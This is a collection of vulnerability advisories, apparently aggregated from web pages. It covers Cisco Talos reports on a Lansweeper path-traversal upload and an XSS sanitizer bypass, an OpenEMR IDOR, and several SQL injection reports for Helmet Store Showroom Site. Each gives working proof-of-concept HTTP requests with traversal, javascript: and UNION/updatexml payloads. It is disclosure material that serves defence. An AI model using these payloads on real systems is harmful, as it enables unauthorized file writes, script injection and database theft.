A directory traversal vulnerability exists in the AssetActions.aspx addDoc functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary file upload. An attacker can send an HTTP request to trigger this vulnerability.

**SUMMARY**

A directory traversal vulnerability exists in the AssetActions.aspx addDoc functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary file upload. An attacker can send an HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Lansweeper lansweeper 10.1.1.0

**PRODUCT URLS**

lansweeper - https://www.lansweeper.com/

**CVSSv3 SCORE**

9.9 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)

**DETAILS**

Lansweeper is an IT Asset Management solution that gathers hardware and software information of computers and other devices on a computer network for management, compliance and audit purposes.

An exploitable directory traversal vulnerability is related with an action: Assets -> choose any asset -> Docs -> Add document and is located inside the \LS\WS\AssetActions.cs file. Let us take a close look at the vulnerable source code :

    Line 1 	else if (page.IsPostBack && current.Request["action"] == "addDoc")
    Line 2 	{
    Line 3 
    Line 4 		if (fileup.PostedFile != null && fileup.PostedFile.ContentLength > 0)
    Line 5 		{
    Line 6 			string text5 = Path.GetFileName(fileup.PostedFile.FileName);
    Line 7 			string text6 = Guid.NewGuid().ToString();
    Line 8 			int value6 = int.Parse(current.Request["assetId"]);
    Line 9 			string item = DateTime.Now.ToString(User.Current().DateTimeFormat);
    Line 10			WebUser webUser2 = (WebUser)current.Session["Webuser"];
    Line 11			string text7 = ((!webUser2.IsAuthenticated) ? webUser2.Displayname : (webUser2.UserDomain + "\\" + webUser2.UserName));
    Line 12			string[] allowedExtensions = General.AllowedExtensions;
    Line 13			string text8 = Path.GetExtension(fileup.FileName).ToLower();
    Line 14			if (txtdocname.Text != "")
    Line 15			{
    Line 16				text5 = txtdocname.Text + text8;
    Line 17			}
    Line 18			bool flag = false;
    Line 19			string[] array = allowedExtensions;
    Line 20			for (int i = 0; i < array.Length; i++)
    Line 21			{
    Line 22				if (array[i] == text8)
    Line 23				{
    Line 24					flag = true;
    Line 25				}
    Line 26			}
    Line 27			string text9 = HttpContext.Current.Server.MapPath("~") + "\\DOCS\\";
    Line 28			string filename = text9 + text6 + "_" + text5;
    Line 29			if (!Directory.Exists(text9))
    Line 30			{
    Line 31				Directory.CreateDirectory(text9);
    Line 32			}
    Line 33			try
    Line 34			{
    Line 35				if (!flag)
    Line 36				{
    Line 37					text4 = text4 + "file extension ('" + text8 + "') is not allowed.";
    Line 38					throw new CustomException(text4);
    Line 39				}
    Line 40				fileup.PostedFile.SaveAs(filename);
    

Uploading a file (document), an attacker can use the txtdocname (Display name in web GUI) variable to provide an alternative filename which is not sanitized at all in a context of directory traversal. Next, that name is concatenated in a simple way with a path to DOCS directory lines 27-28. Lack of proper txtdocname sanitization allows an attacker to upload a file to an arbitrary destination within the file system.

**Exploit Proof of Concept**

REQUEST

    POST /AssetActions.aspx?action=addDoc&assetId=10 HTTP/1.1
    Host: 192.168.0.102:81
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: pl,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------23614898975253108242957970650
    Content-Length: 644
    Origin: http://192.168.0.102:81
    Connection: close
    Referer: http://192.168.0.102:81/AssetActions.aspx?action=addDoc&assetId=10
    Cookie: UserSettings=language=1; ASP.NET_SessionId=etcnsycpe3rytjmue2efl5co; custauth=username=hacker&userdomain=; __RequestVerificationToken_Lw__=zP2evPOU4gLNF/pF3R1XPsIP7ceImHsHKoqy7GfYwDnIwHnDJKt3r5+0bFTXNS/XpEAiyEFBVT2ekfSLIPgVMULtvi8Ae4qLSYcUO0UH90vcERUKMi72E3I2yEJexWSyNKlA8gcXlfMPYbc0a94Dji44b2cNn4aS0KGOSUQBn/0=
    Upgrade-Insecure-Requests: 1
    
    -----------------------------23614898975253108242957970650
    Content-Disposition: form-data; name="__VIEWSTATE"
    
    
    -----------------------------23614898975253108242957970650
    Content-Disposition: form-data; name="fileup"; filename="doc_name_ppt.magicext.ini"
    Content-Type: application/vnd.ms-powerpoint
    
    ATTACKER CONTROLED CONTENT
    -----------------------------23614898975253108242957970650
    Content-Disposition: form-data; name="txtdocname"
    
    ..\..\..\HACKED
    -----------------------------23614898975253108242957970650
    Content-Disposition: form-data; name="btnOK"
    
    Upload
    -----------------------------23614898975253108242957970650--
    

RESPONSE

    HTTP/1.1 200 OK
    Cache-Control: no-cache
    Pragma: no-cache
    Content-Type: text/html; charset=utf-8
    Expires: -1
    Vary: Accept-Encoding
    Server: Microsoft-IIS/8.0
    x-frame-options: SAMEORIGIN
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Mon, 06 Jun 2022 14:53:18 GMT
    Connection: close
    Content-Length: 159
    
    <script>window.parent.closeIframe(["10","..\\..\\..\\HACKED.ini","6405c669-95ed-4469-bb1a-ae4665868d1a","..\\Unauthenticated","06/06/2022 16:53:18"]);</script>
    

**TIMELINE**

2022-06-27 - Vendor Disclosure  
2022-11-29 - Vendor Patch Release  
2022-12-01 - Public Release

Discovered by Marcin 'Icewall' Noga of Cisco Talos.

CVE-2022-32573: TALOS-2022-1528 || Cisco Talos Intelligence Group

A cross-site scripting (xss) sanitization vulnerability bypass exists in the SanitizeHtml functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary Javascript code injection. An attacker can send an HTTP request to trigger this vulnerability.

**SUMMARY**

A cross-site scripting (xss) sanitization vulnerability bypass exists in the SanitizeHtml functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary Javascript code injection. An attacker can send an HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Lansweeper lansweeper 10.1.1.0

**PRODUCT URLS**

lansweeper - https://www.lansweeper.com/

**CVSSv3 SCORE**

9.1 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-184 - Incomplete Blacklist

**DETAILS**

Lansweeper is an IT Asset Management solution that gathers hardware and software information of computers and other devices on a computer network for management, compliance and audit purposes.

Lansweeper developers allow users to use certain html tags together with chosen attributes in content added/created by users, e.g. News, Ticket text, etc. To avoid malicious XSS attacks, data which might contain such code is sanitized before being added to the page content. We can see such a sanitization example in the widget responsible for News presentation:

    Line 1 	\App_Web_2mmqsorv\ASP\widgets_helpdesknews_aspx.cs
    Line 2 			
    Line 3 			Dictionary<int, News> dictionary = (from row in NewsController.GetClonedCachedNews().AsEnumerable()
    Line 4 				where row.value.Enabled
    Line 5 				select row).ToDictionary((KeyValuePair<int, News> row) => row.Key, (KeyValuePair<int, News> row) => row.Value);
    Line 6 			if (dictionary.Values.Count > 0)
    Line 7 			{
    Line 8 				__w.Write("\r\n        <div id=\"news\" style=\"overflow: auto; line-height: normal;\">\r\n            <div>\r\n                <table>\r\n                    <tbody>\r\n                        ");
    Line 9 				foreach (News objNews in dictionary.objNewss)
    Line 10				{
    Line 11					__w.Write("\r\n                                <tr>\r\n                                    <td valign=\"top\">\r\n                                        ");
    Line 12					if (objNews.Type != 5)
    Line 13					{
    Line 14						__w.Write("\r\n                                            <img alt=\"\" src=\"");
    Line 15						__w.Write(General.PathPrefix());
    Line 16						__w.Write("images/p");
    Line 17						__w.Write(HttpUtility.HtmlEncode(objNews.Type));
    Line 18						__w.Write(".png\"/>\r\n                                        ");
    Line 19					}
    Line 20					__w.Write("\r\n                                    </td>\r\n                                    <td width=\"100%\">");
    Line 21					__w.Write(HtmlSanitizer.SanitizeHtml(objNews.GetTextTranslation(LS.User.Current().Lang)));
    Line 22					__w.Write("</td>\r\n                                </tr>\r\n                        ");
    Line 23				}
    Line 24				__w.Write("\r\n                    </tbody>\r\n                </table>\r\n            </div>\r\n        </div>  \r\n    ");
    Line 25			}
    

as we can see in line 21 before news text is written to the page content, it’s being sanitized by HtmlSanitizer.SanitizeHtml method. Let us take a look at HtmlSanitizer class implementation:

    Line 1 	LS\Extensions\HtmlSanitizer\HtmlSanitizer.cs
    Line 2 	(...)
    Line 3 			public static HtmlSanitizer CustomHtmlSanitizer()
    Line 4 			{
    Line 5 				HtmlSanitizer htmlSanitizer = new HtmlSanitizer();
    Line 6 				string text = "width height style align valign";
    Line 7 				string[] array = new string[58]
    Line 8 				{
    Line 9 					"h1", "h2", "h3", "h3", "h4", "h5", "h6", "strong", "b", "i",
    Line 10					"em", "thead", "tbody", "tr", "br", "p", "div", "span", "ul", "u",
    Line 11					"pre", "sub", "sup", "strike", "hr", "center", "dl", "dt", "dd", "abbr",
    Line 12					"address", "article", "aside", "bdi", "canvas", "caption", "cite", "code", "col", "colgroup",
    Line 13					"datalist", "dfn", "figcaption", "footer", "header", "kbd", "mark", "nav", "noscript", "picture",
    Line 14					"summary", "s", "samp", "section", "small", "tfoot", "var", "wbr"
    Line 15				};
    Line 16				foreach (string tagName in array)
    Line 17				{
    Line 18					htmlSanitizer.Tag(tagName).AllowAttributes(text);
    Line 19				}
    Line 20				htmlSanitizer.Tag("img").AllowAttributes(text + " src title alt crossorigin ismap longdesc usemap");
    Line 21				htmlSanitizer.Tag("table").AllowAttributes(text + " border cellpadding cellspacing rules sortable summary");
    Line 22				htmlSanitizer.Tag("td").AllowAttributes(text + " colspan rowspan headers");
    Line 23				htmlSanitizer.Tag("ol").AllowAttributes(text + " start reversed type");
    Line 24				htmlSanitizer.Tag("font").AllowAttributes(text + " color face size");
    Line 25				htmlSanitizer.Tag("a").AllowAttributes(text + " href dowload hreflang media media_query rel target type").RemoveEmpty();
    Line 26				htmlSanitizer.Tag("video").AllowAttributes(text + " controls autoplay loop muted poster preload src");
    Line 27				htmlSanitizer.Tag("source").AllowAttributes(text + " src type media");
    Line 28				htmlSanitizer.Tag("map").AllowAttributes(text + " name");
    Line 29				htmlSanitizer.Tag("area").AllowAttributes(text + " alt coords download href hreflang media rel shape target type");
    Line 30				htmlSanitizer.Tag("audio").AllowAttributes(text + " autoplay controls loop muted preload src");
    Line 31				htmlSanitizer.Tag("bdo").AllowAttributes(text + " dir");
    Line 32				htmlSanitizer.Tag("blockquote").AllowAttributes(text + " cite");
    Line 33				htmlSanitizer.Tag("button").AllowAttributes(text + " autofocus disabled form formaction formenctype formmethod formnovalidate formtarget name type value");
    Line 34				htmlSanitizer.Tag("del").AllowAttributes(text + " cite datetime");
    Line 35				htmlSanitizer.Tag("ins").AllowAttributes(text + " cite datetime");
    Line 36				htmlSanitizer.Tag("details").AllowAttributes(text + " open");
    Line 37				htmlSanitizer.Tag("dialog").AllowAttributes(text + " open");
    Line 38				htmlSanitizer.Tag("label").AllowAttributes(text + " for");
    Line 39				htmlSanitizer.Tag("li").AllowAttributes(text + " value");
    Line 40				htmlSanitizer.Tag("map").AllowAttributes(text + " name");
    Line 41				htmlSanitizer.Tag("menu").AllowAttributes(text + " label type");
    Line 42				htmlSanitizer.Tag("menuitem").AllowAttributes(text + " checked command default disabled icon label type");
    Line 43				htmlSanitizer.Tag("q").AllowAttributes(text + " cite");
    Line 44				htmlSanitizer.Tag("th").AllowAttributes(text + " abbr colspan headers rowspan scope sorted");
    Line 45				htmlSanitizer.Tag("time").AllowAttributes(text + " datetime");
    Line 46				htmlSanitizer.Tag("track").AllowAttributes(text + " default kind label src srclang");
    Line 47				htmlSanitizer.RemoveComments = true;
    Line 48				htmlSanitizer.ForbiddenElements.Add("script");
    Line 49				htmlSanitizer.ForbiddenElements.Add("style");
    Line 50				htmlSanitizer.TransformLinks = true;
    Line 51				return htmlSanitizer;
    Line 52			}
    Line 53
    Line 54			public static string SanitizeHtml(string html, params string[] WhiteList)
    Line 55			{
    Line 56				string text = "";
    Line 57				try
    Line 58				{
    Line 59					text = new SimpleHtmlParser().ParseString(html).OuterXml;
    Line 60				}
    Line 61				catch (Exception ex)
    Line 62				{
    Line 63					ErrorLogging.LogToFile(ex, "Parser error");
    Line 64					text = html;
    Line 65				}
    Line 66				text = CustomHtmlSanitizer().Sanitize(text);
    Line 67				HtmlDocument htmlDocument = new HtmlDocument();
    Line 68				htmlDocument.LoadHtml(text);
    Line 69				SanitizeCss(htmlDocument.DocumentNode);
    Line 70				if (htmlDocument.DocumentNode.ChildNodes.Count == 0 || htmlDocument.DocumentNode.ChildNodes.Count > 1)
    Line 71				{
    Line 72					return "<div style=\"font:12px Arial,Verdana;font-size:12px;font-family:Arial,Verdana;\">" + htmlDocument.DocumentNode.InnerHtml.Trim() + "</div>";
    Line 73				}
    Line 74				return htmlDocument.DocumentNode.InnerHtml.Trim();
    Line 75			}
    Line 76	(...)
    

That’s of course just a part of this class, but we can observe more or less what the assumptions are, etc. This class contains a list of allowed html tags and their attributes the user might use in the text. There are also additional checks for particular attributes (for example, for href where developers check whether it does not start with a schema different than “http/https”). Unfortunately developers allow a tag like button with its attribute formaction and do not sanitize it at all. This gives a potential attacker the possibility to inject malicious javascript code, which will be triggered after the user clicks the button.

**Exploit Proof of Concept**

REQUEST POST /configuration/MainPage/MainPageActions.aspx?action=editnews&id=3 HTTP/1.1 Host: 192.168.0.102:81 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0 Accept: _/_ Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 438 Origin: http://192.168.0.102:81 Connection: close Referer: http://192.168.0.102:81/configuration/MainPage/ Cookie: UserSettings=language=1; ASP.NET\_SessionId=ke33dhy3jtng0hcwed2fe5av; custauth=username=hacker&userdomain=;

    __VIEWSTATE=&editnewstext=<button style="width: 500px;height:500px" form="formc" formaction="javascript:alert(1)">click me</button>&newsid=3
    

RESPONSE HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/8.0 x-frame-options: SAMEORIGIN X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Thu, 09 Jun 2022 10:15:53 GMT Connection: close Content-Length: 150

    {"ErrorType":"","Error":false,"Emsg":"","AddedRows":[],"Columns":[],"Columnwid":[],"Action":"","ReturnValues":{},"ReturnValue":"","ReturnObject":null}
    

**TIMELINE**

2022-06-27 - Vendor Disclosure  
2022-11-29 - Vendor Patch Release  
2022-12-01 - Public Release

Discovered by Marcin 'Icewall' Noga of Cisco Talos.

CVE-2022-32763: TALOS-2022-1541 || Cisco Talos Intelligence Group

Improper Access Control in GitHub repository openemr/openemr prior to 7.0.0.2.

**Description:-**

In this case an idor allow an attacker to view portal user's appointments

**Proof of Concept**

    1.Goto http://demo.openemr.io/openemr/portal/home.php and then goto my profile >my appointment
    2.Click on edit appointment button and capture the request in burp suite 
    3. Change eid parameter to any number 
    

**poc**

GET https://demo.openemr.io/openemr/portal/add\_edit\_event\_user.php?eid=24 <-- Change this to 23,22,25

Host: demo.openemr.io

User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0

Accept: _/_

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Referer: https://demo.openemr.io/openemr/portal/home.php

X-Requested-With: XMLHttpRequest

DNT: 1

Connection: keep-alive

Cookie: PortalOpenEMR=Sessionid

Sec-Fetch-Dest: empty

Sec-Fetch-Mode: no-cors

Sec-Fetch-Site: same-origin

Pragma: no-cache

Cache-Control: no-cache

    
    
    
    # Impact
    
    An attacker can view all Appointments

CVE-2022-4505: Idor disclose other user's appointment in openemr

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/admin/?page=user/manage_user&id=.

Permalink

Cannot retrieve contributors at this time

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/admin/?page=user/manage\_user&id=

Vulnerability location: /hss/admin/?page=user/manage\_user&id=,id

dbname =hss\_db,length=6

\[+\] Payload: /hss/admin/?page=user/manage\_user&id=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /hss/admin/?page\=user/manage\_user&id\=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46124: bug_report/SQLi-9.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/admin/categories/manage_category.php?id=.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/admin/categories/manage\_category.php?id=

Vulnerability location: /hss/admin/categories/manage\_category.php?id=,id

dbname =hss\_db,length=6

\[+\] Payload: /hss/admin/categories/manage\_category.php?id=-5%27%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> id

GET /hss/admin/categories/manage\_category.php?id\=\-5%27%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46123: bug_report/SQLi-7.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/admin/?page=products/manage_product&id=.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/admin/?page=products/manage\_product&id=

Vulnerability location: /hss/admin/?page=products/manage\_product&id=,id

dbname =hss\_db,length=6

\[+\] Payload: /hss/admin/?page=products/manage\_product&id=-2%27%20union%20select%201,2,3,4,database(),6,7,8,9,10--+ // Leak place ---> id

GET /hss/admin/?page\=products/manage\_product&id\=\-2%27%20union%20select%201,2,3,4,database(),6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46121: bug_report/SQLi-5.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/admin/?page=products/view_product&id=.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/admin/?page=products/view\_product&id=

Vulnerability location: /hss/admin/?page=products/view\_product&id=,id

dbname =hss\_db,length=6

\[+\] Payload: /hss/admin/?page=products/view\_product&id=-2%27%20union%20select%201,2,3,4,database(),6,7,8,9,10,11,12,13--+ // Leak place ---> id

GET /hss/admin/?page\=products/view\_product&id\=\-2%27%20union%20select%201,2,3,4,database(),6,7,8,9,10,11,12,13\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46120: bug_report/SQLi-4.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/classes/Master.php?f=delete_product.

Permalink

Cannot retrieve contributors at this time

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/classes/Master.php?f=delete\_product

Vulnerability location: /hss/classes/Master.php?f=delete\_product,id

dbname =hss\_db,length=6

\[+\] Payload: id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /hss/classes/Master.php?f\=delete\_product HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/hss/admin/?page=products
Content-Length: 65
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close
id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-46127: bug_report/SQLi-11.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/admin/?page=client/manage_client&id=.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

First execute the following sql statement in the database to create the clients table

CREATE TABLE \`clients\` (
  \`id\` int(11) NOT NULL,
) ENGINE\=InnoDB DEFAULT CHARSET\=utf8mb4;
COMMIT;

Vulnerability File: /hss/admin/?page=client/manage\_client&id=

Vulnerability location: /hss/admin/?page=client/manage\_client&id=,id

dbname =hss\_db,length=6

\[+\] Payload: /hss/admin/?page=client/manage\_client&id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /hss/admin/?page\=client/manage\_client&id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46125: bug_report/SQLi-10.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/?page=product_per_brand&bid=.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/?page=product\_per\_brand&bid=

Vulnerability location: /hss/?page=product\_per\_brand&bid=, id

dbname =hss\_db,length=6

\[+\] Payload: /hss/?page=product\_per\_brand&bid=-2%27%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> bid

GET /hss/?page\=product\_per\_brand&bid\=\-2%27%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

Tag

#firefox